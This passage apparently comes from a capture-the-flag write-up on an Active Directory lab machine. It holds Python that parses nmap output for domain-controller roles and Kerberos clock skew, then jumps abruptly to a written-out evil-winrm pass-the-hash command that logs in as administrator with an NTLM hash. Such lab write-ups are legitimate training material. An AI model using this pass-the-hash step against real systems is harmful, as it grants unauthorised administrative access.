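KERBEROS_MAX_SKEW = 300                                      # seconds, the default Kerberos tolerance

# Role hints (my own mapping, not nmap's).
OTHER_ROLES = {1433: "MSSQL server", 5985: "WinRM endpoint", 3389: "RDP host"}


def parse_ports(scan: str) -> dict:
    """Map open port number -> service name from nmap's normal output."""
    ports = {}
    for line in scan.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = m.group(4)
    return ports


def host_roles(ports: dict) -> list:
    """Kerberos together with LDAP on one host is the domain-controller signature; other roles add on."""
    roles = []
    if 88 in ports and (389 in ports or 636 in ports):
        roles.append("domain controller")
    roles += [name for port, name in OTHER_ROLES.items() if port in ports]
    return roles


def ad_domain(scan: str):
    """Domain name from the LDAP banner, without the trailing '0.' nmap printed in this scan."""
    m = DOMAIN_RE.search(scan)
    return re.sub(r"0?\.$", "", m.group(1)) if m else None


def skew_seconds(text: str):
    """Turn an nmap duration such as '+8h00m01s' or '-1s' into signed seconds."""
    m = SKEW_RE.search(text)
    if not m:
        return None
    sign, h, mi, s = m.groups()
    total = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s)
    return -total if sign else total


def reported_skew(scan: str):
    """Prefer the aggregated clock-skew host script; fall back to any ssl-date line."""
    for line in scan.splitlines():
        if "clock-skew: mean:" in line:
            return skew_seconds(line.split("mean:", 1)[1])
    for line in scan.splitlines():
        if "ssl-date:" in line and "from scanner time" in line:
            return skew_seconds(line.split(";", 1)[1])
    return None


def kerberos_will_fail(skew, tolerance: int = KERBEROS_MAX_SKEW) -> bool:
    """True when the offset exceeds what the KDC accepts, i.e. KRB_AP_ERR_SKEW is to be expected."""
    return skew is not None and abs(skew) > tolerance


if __name__ == "__main__":
    ports = parse_ports(SCAN)
    skew = reported_skew(SCAN)
    print("domain:", ad_domain(SCAN), "roles:", host_roles(ports))
    print(f"skew {skew}s, Kerberos will fail: {kerberos_will_fail(skew)}")
```

On the defender's side the same numbers matter in reverse: a member server eight hours off the DC fails Kerberos in exactly this way, and an ssl-date skew that differs between services on one host usually means a VM clock being stepped by the hypervisor.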
Boom! We have the hash! Time to Pass-The-Hash with Evil-WinRM!
evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Go and grab that root.txt!